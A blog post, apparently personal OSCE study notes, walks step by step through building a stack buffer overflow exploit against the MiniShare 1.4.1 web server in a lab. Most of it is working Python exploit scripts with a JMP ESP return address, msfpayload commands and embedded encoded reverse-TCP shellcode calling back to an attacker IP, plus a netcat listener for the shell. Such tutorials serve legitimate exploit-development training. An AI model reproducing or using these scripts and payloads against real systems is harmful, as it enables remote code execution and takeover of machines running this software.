Hello all, back at it again. There was a post on one of my favorite forums recently. It got me back to into my "Cracking the Perimeter", OSCE (offensive security certified expert) notes. It is always good to go over your coursework after a while. Anyway, the post was asking about shellcode execution after you jump back in the stack for a specific app called Minishare. During the OffSec course, I learned how to jump around with shellcode from the corelan.be website and the offsec course. You can usually go to the registers with a direct jump or do some math to the registers to jump to a different location in the stack. Or, you can do a negative jump, a (negative offset). In this exploit, you can do a lot since you have enough room in the stack and the ESP register lands perfectly in the buffer so you can basically go anywhere. I will leave all the links I used for information and more importantly, credit.
Well, let's go to the beginning of the post. The version of the software was MiniShare 1.4.1. Sidenote: g0tmi1k (http://blog.g0tmi1k.com/), greycorner (http://www.thegreycorner.com/2010/01/beginning-stack-based-buffer-overflow.html), resources.infosecinstitute.com and corelan.be are great resources for exploit development, fuzzing and the "Cracking the Perimeter" course. Ok, I was able to download the software (the specific version) from the greycorner site. I loaded it on a Windows XP SP3 virtual machine. It is pretty quick to install and get running. It opens up local port 80 once it is running. You can telnet to the port to test it out (telnet x.x.x.x port). In addition, you want to fire up Wireshark so you can monitor traffic going to the server from the attacking machine. To cut on time, I used an exoskeleton of the code that Dark_Knight posted on EthicalHacker.Net:
........................................................
#!/usr/bin/python
import socket
import os
buffer = "\x41" * 3000
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
From the picture, you can see that the app Minishare crashes and EIP is overwritten. I usually use ollydbg as my debugger, but from now on, I will use Immunity Debugger. I want to prepare for the Corelan course being held at DerbyCon in September. In addition, I want to start using Mona.py so I can use ROP on various exploit development. Anyway, there are two techniques I use to find the buffer length so you can overwrite the EIP. First, I divide the buffer in half using "A's", "B's" and "C's". I would keep sending different lengths until I could find the EIP. Secondly, I would use the MetaSploit pattern tool. You have to go into the tools folder of MetaSploit and execute:
........................................................
#!/usr/bin/python
import socket
import os
buffer = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9")
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
Once you send the new buffer, record what the EIP is now set to. You can use:
/opt/framework/msf3/tools# ruby1.9.3 pattern_offset.rb 36684335
[*] Exact match at offset 1787
........................................................
Now, we have the buffer length so we can overwrite EIP. Next, we should check all the executable modules for "jumping" commands. Since we see that our buffer lands in the ESP register, we need the command to jump into the ESP register. We click on View -> Executable Modules. Now, click on the DLL that is NOT red which indicates that ASLR is not in effect. Once you have clicked on the DLL, right-click in the upper left section, click on "Search for". Next, click on "command" and type in "jmp esp". Once you click "OK", you will be presented an address where the command is located. Now, when you see the address, make sure the address does not have "\x20, \x00, \x0d and \x0a". If you don't, it usually means exploit will not work. I chose the USER32.DLL and the address "7E429353". The new script is:
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
buffer = "\x41" * 1787 + "\x53\x93\x42\x7E" + "\x42" * 1209
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
Before you send the buffer, go to the address and set a breakpoint (F2). Once the exploit is sent, it will stop at the breakpoint so you can "step thru" (F7) the stack. When you step thru, the command to jump to the ESP register is executed. You land right at the second part of the buffer after 1792 characters.
Now, this brings us back to the original question. How do you go backwards far enough and execute shellcode without bad characters? Well, first, let's get jumping backwards far enough. How far back to we have to go? In order to figure that out, let's create some shellcode and see how big it is.
root@kryptonite:/opt/framework/msf3# msfpayload windows/shell/reverse_tcp LHOST=192.168.150.119 LPORT=80 R | msfencode -b '\0x00\0x0a\0x0d\0x20' -t c -e x86/alpha_mixed[*] x86/alpha_mixed succeeded with size 642 (iteration=1)
unsigned char buf[] =
"\x89\xe0\xdb\xd5\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x68\x68\x4d\x59\x77\x70\x53\x30\x35\x50\x61\x70\x4c"
"\x49\x79\x75\x55\x61\x68\x52\x30\x64\x4e\x6b\x36\x32\x44\x70"
"\x4c\x4b\x50\x52\x74\x4c\x6e\x6b\x66\x32\x66\x74\x4e\x6b\x71"
"\x62\x31\x38\x64\x4f\x58\x37\x63\x7a\x47\x56\x64\x71\x49\x6f"
"\x65\x61\x69\x50\x6c\x6c\x77\x4c\x75\x31\x31\x6c\x34\x42\x64"
"\x6c\x45\x70\x39\x51\x58\x4f\x44\x4d\x57\x71\x4a\x67\x6b\x52"
"\x5a\x50\x71\x42\x33\x67\x4c\x4b\x36\x32\x74\x50\x4c\x4b\x53"
"\x72\x55\x6c\x57\x71\x5a\x70\x4c\x4b\x31\x50\x33\x48\x6e\x65"
"\x4f\x30\x62\x54\x62\x6a\x56\x61\x4e\x30\x72\x70\x6c\x4b\x70"
"\x48\x62\x38\x4c\x4b\x62\x78\x77\x50\x57\x71\x4b\x63\x78\x63"
"\x57\x4c\x33\x79\x6e\x6b\x55\x64\x4e\x6b\x46\x61\x4e\x36\x55"
"\x61\x79\x6f\x50\x31\x4f\x30\x6e\x4c\x6a\x61\x38\x4f\x34\x4d"
"\x43\x31\x4f\x37\x70\x38\x6b\x50\x53\x45\x5a\x54\x73\x33\x31"
"\x6d\x38\x78\x67\x4b\x31\x6d\x67\x54\x63\x45\x59\x72\x70\x58"
"\x6e\x6b\x61\x48\x54\x64\x76\x61\x58\x53\x53\x56\x6e\x6b\x66"
"\x6c\x52\x6b\x6e\x6b\x50\x58\x35\x4c\x56\x61\x4b\x63\x4e\x6b"
"\x67\x74\x6e\x6b\x57\x71\x4a\x70\x4c\x49\x31\x54\x45\x74\x71"
"\x34\x33\x6b\x31\x4b\x45\x31\x73\x69\x50\x5a\x33\x61\x59\x6f"
"\x39\x70\x66\x38\x53\x6f\x50\x5a\x4e\x6b\x35\x42\x5a\x4b\x6f"
"\x76\x33\x6d\x65\x38\x54\x73\x76\x52\x75\x50\x67\x70\x42\x48"
"\x64\x37\x62\x53\x67\x42\x51\x4f\x50\x54\x32\x48\x32\x6c\x34"
"\x37\x57\x56\x64\x47\x59\x6f\x59\x45\x6d\x68\x5a\x30\x46\x61"
"\x37\x70\x35\x50\x34\x69\x69\x54\x63\x64\x50\x50\x55\x38\x35"
"\x79\x6f\x70\x62\x4b\x35\x50\x39\x6f\x69\x45\x46\x30\x72\x70"
"\x66\x30\x36\x30\x71\x50\x30\x50\x61\x50\x46\x30\x75\x38\x39"
"\x7a\x34\x4f\x49\x4f\x4d\x30\x49\x6f\x5a\x75\x4e\x77\x63\x5a"
"\x54\x45\x52\x48\x4f\x30\x39\x38\x6d\x46\x73\x47\x52\x48\x43"
"\x32\x33\x30\x65\x50\x46\x30\x4f\x79\x68\x66\x71\x7a\x76\x70"
"\x53\x66\x52\x77\x75\x38\x7a\x39\x4f\x55\x50\x74\x53\x51\x49"
"\x6f\x48\x55\x6c\x45\x49\x50\x62\x54\x54\x4c\x69\x6f\x50\x4e"
"\x74\x48\x34\x35\x4a\x4c\x35\x38\x5a\x50\x6e\x55\x4d\x72\x61"
"\x46\x49\x6f\x69\x45\x63\x5a\x43\x30\x52\x4a\x47\x74\x33\x66"
"\x63\x67\x51\x78\x76\x62\x48\x59\x6b\x78\x33\x6f\x49\x6f\x69"
"\x45\x4e\x6b\x74\x76\x70\x6a\x61\x50\x51\x78\x67\x70\x76\x70"
"\x65\x50\x67\x70\x56\x36\x62\x4a\x33\x30\x42\x48\x32\x78\x4e"
"\x44\x33\x63\x7a\x45\x79\x6f\x68\x55\x7a\x33\x72\x73\x53\x5a"
"\x55\x50\x72\x76\x62\x73\x36\x37\x75\x38\x47\x72\x49\x49\x79"
"\x58\x31\x4f\x79\x6f\x6e\x35\x75\x51\x5a\x63\x65\x79\x6f\x36"
"\x6c\x45\x68\x76\x64\x35\x78\x6c\x58\x43\x41\x41";
Looks like the size of the shellcode is 642. Ok, let's look at our buffer again. It is (buffer = "\x41" * 1787 + "\x53\x93\x42\x7E" + "\x42" * 1209). We need to jump back about 700 characters. In order to jump back in the stack, I tried the technique on corelan.be.
0 - 700 = -700 -> FFFFFD44
(50[NOP SLIDE] + 642[shellcode] + 4[jmp] + "\xe9\x44\xFD\xFF\xFF"[backward jmp 700]). We subtract 1209 by 5 and subtract 1787 by 692. This is the new script:
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
# [*] x86/alpha_mixed succeeded with size 642 (iteration=1)
# windows/shell/reverse_tcp LHOST=192.168.150.119 LPORT=80 R
sc=("\x89\xe0\xdb\xd5\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x68\x68\x4d\x59\x77\x70\x53\x30\x35\x50\x61\x70\x4c"
"\x49\x79\x75\x55\x61\x68\x52\x30\x64\x4e\x6b\x36\x32\x44\x70"
"\x4c\x4b\x50\x52\x74\x4c\x6e\x6b\x66\x32\x66\x74\x4e\x6b\x71"
"\x62\x31\x38\x64\x4f\x58\x37\x63\x7a\x47\x56\x64\x71\x49\x6f"
"\x65\x61\x69\x50\x6c\x6c\x77\x4c\x75\x31\x31\x6c\x34\x42\x64"
"\x6c\x45\x70\x39\x51\x58\x4f\x44\x4d\x57\x71\x4a\x67\x6b\x52"
"\x5a\x50\x71\x42\x33\x67\x4c\x4b\x36\x32\x74\x50\x4c\x4b\x53"
"\x72\x55\x6c\x57\x71\x5a\x70\x4c\x4b\x31\x50\x33\x48\x6e\x65"
"\x4f\x30\x62\x54\x62\x6a\x56\x61\x4e\x30\x72\x70\x6c\x4b\x70"
"\x48\x62\x38\x4c\x4b\x62\x78\x77\x50\x57\x71\x4b\x63\x78\x63"
"\x57\x4c\x33\x79\x6e\x6b\x55\x64\x4e\x6b\x46\x61\x4e\x36\x55"
"\x61\x79\x6f\x50\x31\x4f\x30\x6e\x4c\x6a\x61\x38\x4f\x34\x4d"
"\x43\x31\x4f\x37\x70\x38\x6b\x50\x53\x45\x5a\x54\x73\x33\x31"
"\x6d\x38\x78\x67\x4b\x31\x6d\x67\x54\x63\x45\x59\x72\x70\x58"
"\x6e\x6b\x61\x48\x54\x64\x76\x61\x58\x53\x53\x56\x6e\x6b\x66"
"\x6c\x52\x6b\x6e\x6b\x50\x58\x35\x4c\x56\x61\x4b\x63\x4e\x6b"
"\x67\x74\x6e\x6b\x57\x71\x4a\x70\x4c\x49\x31\x54\x45\x74\x71"
"\x34\x33\x6b\x31\x4b\x45\x31\x73\x69\x50\x5a\x33\x61\x59\x6f"
"\x39\x70\x66\x38\x53\x6f\x50\x5a\x4e\x6b\x35\x42\x5a\x4b\x6f"
"\x76\x33\x6d\x65\x38\x54\x73\x76\x52\x75\x50\x67\x70\x42\x48"
"\x64\x37\x62\x53\x67\x42\x51\x4f\x50\x54\x32\x48\x32\x6c\x34"
"\x37\x57\x56\x64\x47\x59\x6f\x59\x45\x6d\x68\x5a\x30\x46\x61"
"\x37\x70\x35\x50\x34\x69\x69\x54\x63\x64\x50\x50\x55\x38\x35"
"\x79\x6f\x70\x62\x4b\x35\x50\x39\x6f\x69\x45\x46\x30\x72\x70"
"\x66\x30\x36\x30\x71\x50\x30\x50\x61\x50\x46\x30\x75\x38\x39"
"\x7a\x34\x4f\x49\x4f\x4d\x30\x49\x6f\x5a\x75\x4e\x77\x63\x5a"
"\x54\x45\x52\x48\x4f\x30\x39\x38\x6d\x46\x73\x47\x52\x48\x43"
"\x32\x33\x30\x65\x50\x46\x30\x4f\x79\x68\x66\x71\x7a\x76\x70"
"\x53\x66\x52\x77\x75\x38\x7a\x39\x4f\x55\x50\x74\x53\x51\x49"
"\x6f\x48\x55\x6c\x45\x49\x50\x62\x54\x54\x4c\x69\x6f\x50\x4e"
"\x74\x48\x34\x35\x4a\x4c\x35\x38\x5a\x50\x6e\x55\x4d\x72\x61"
"\x46\x49\x6f\x69\x45\x63\x5a\x43\x30\x52\x4a\x47\x74\x33\x66"
"\x63\x67\x51\x78\x76\x62\x48\x59\x6b\x78\x33\x6f\x49\x6f\x69"
"\x45\x4e\x6b\x74\x76\x70\x6a\x61\x50\x51\x78\x67\x70\x76\x70"
"\x65\x50\x67\x70\x56\x36\x62\x4a\x33\x30\x42\x48\x32\x78\x4e"
"\x44\x33\x63\x7a\x45\x79\x6f\x68\x55\x7a\x33\x72\x73\x53\x5a"
"\x55\x50\x72\x76\x62\x73\x36\x37\x75\x38\x47\x72\x49\x49\x79"
"\x58\x31\x4f\x79\x6f\x6e\x35\x75\x51\x5a\x63\x65\x79\x6f\x36"
"\x6c\x45\x68\x76\x64\x35\x78\x6c\x58\x43\x41\x41")
# (50[NOP SLIDE] + 642[shellcode] + 4[jmp] + "\xe9\x44\xFD\xFF\xFF"[backward jmp 700])
buffer = "\x41" * 1095 + "\x90" * 50 + sc + "\x53\x93\x42\x7E" + "\xe9\x44\xFD\xFF\xFF" + "\x42" * 1204
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
We also want to run netcat to wait for the returning shell:
root@kryptonite:~/Desktop# nc.traditional -lvp 80
listening on [any] 80 ...
However, it does not work. Maybe that was the trouble DK ran into. It is probably a couple of bad characters. No problem. Let's make an additional section of our buffer with all possible characters.
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
Now, the new script:
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
# [*] x86/alpha_mixed succeeded with size 642 (iteration=1)
# windows/shell/reverse_tcp LHOST=192.168.150.119 LPORT=80 R
# 255
badchar=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "\x41" * 1787 + "\x53\x93\x42\x7E" + "\x42" * 10 + badchar + "\x42" * 944
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
It looks like "0d" may be the first bad character. We remove that character and resend. Ok, I have checked all the characters and the only bad character I see is "0d".
It seems like the shellcode is getting scrambled. What happens when I move the shellcode to a different area? I will try to move it to the right of the crash point. Also, let try a different encoding.
........................................................
#!/usr/bin/python
import socket
import os
#User32.dll
#7E429353 FFE4 JMP ESP
# "\x53\x93\x42\x7E"
# msfpayload windows/shell_reverse_tcp LHOST=192.168.150.119 LPORT=55555 R | msfencode -b '\0x00\0x0a\0x0d\0x20' -t c -e x86/shikata_ga_nai
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
sc=("\xbb\x4d\xb0\x07\x86\xdd\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x5e\x14\x83\xc6\x04\x03\x5e\x10\xaf\x45\xfb\x6e\xa6"
"\xa6\x04\x6f\xd8\x2f\xe1\x5e\xca\x54\x61\xf2\xda\x1f\x27\xff"
"\x91\x72\xdc\x74\xd7\x5a\xd3\x3d\x5d\xbd\xda\xbe\x50\x01\xb0"
"\x7d\xf3\xfd\xcb\x51\xd3\x3c\x04\xa4\x12\x78\x79\x47\x46\xd1"
"\xf5\xfa\x76\x56\x4b\xc7\x77\xb8\xc7\x77\x0f\xbd\x18\x03\xa5"
"\xbc\x48\xbc\xb2\xf7\x70\xb6\x9c\x27\x80\x1b\xff\x14\xcb\x10"
"\xcb\xef\xca\xf0\x02\x0f\xfd\x3c\xc8\x2e\x31\xb1\x11\x76\xf6"
"\x2a\x64\x8c\x04\xd6\x7e\x57\x76\x0c\x0b\x4a\xd0\xc7\xab\xae"
"\xe0\x04\x2d\x24\xee\xe1\x3a\x62\xf3\xf4\xef\x18\x0f\x7c\x0e"
"\xcf\x99\xc6\x34\xcb\xc2\x9d\x55\x4a\xaf\x70\x6a\x8c\x17\x2c"
"\xce\xc6\xba\x39\x68\x85\xd2\x8e\x46\x36\x23\x99\xd1\x45\x11"
"\x06\x49\xc2\x19\xcf\x57\x15\x5d\xfa\x2f\x89\xa0\x05\x4f\x83"
"\x66\x51\x1f\xbb\x4f\xda\xf4\x3b\x6f\x0f\x5a\x6c\xdf\xe0\x1a"
"\xdc\x9f\x50\xf2\x36\x10\x8e\xe2\x38\xfa\xb9\x25\xae\xc5\x12"
"\x3f\x58\xae\x60\x3f\x7e\x2d\xec\xd9\xea\x22\xb8\x72\x83\xdb"
"\xe1\x08\x32\x23\x3c\x98\xd7\xb6\xdb\x58\x91\xaa\x73\x0f\xf6"
"\x1d\x8a\xc5\xea\x04\x24\xfb\xf6\xd1\x0f\xbf\x2c\x22\x91\x3e"
"\xa0\x1e\xb5\x50\x7c\x9e\xf1\x04\xd0\xc9\xaf\xf2\x96\xa3\x01"
"\xac\x40\x1f\xc8\x38\x14\x53\xcb\x3e\x19\xbe\xbd\xde\xa8\x17"
"\xf8\xe1\x05\xf0\x0c\x9a\x7b\x60\xf2\x71\x38\x90\xb9\xdb\x69"
"\x39\x64\x8e\x2b\x24\x97\x65\x6f\x51\x14\x8f\x10\xa6\x04\xfa"
"\x15\xe2\x82\x17\x64\x7b\x67\x17\xdb\x7c\xa2")
# (50[NOP SLIDE] + 642[shellcode] + 4[jmp] + "\xe9\x44\xFD\xFF\xFF"[backward jmp 370])
buffer = "\x90" * 1747 + "\x41" * 40 + "\x53\x93\x42\x7E" + "\x90" * 5 + sc + "\x42" * 863
buffer="GET " + buffer + " HTTP/1.1\r\n\r\n"
print "Sending buffer to MiniShare..."
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.150.114", 80))
s.send(buffer)
s.close()
........................................................
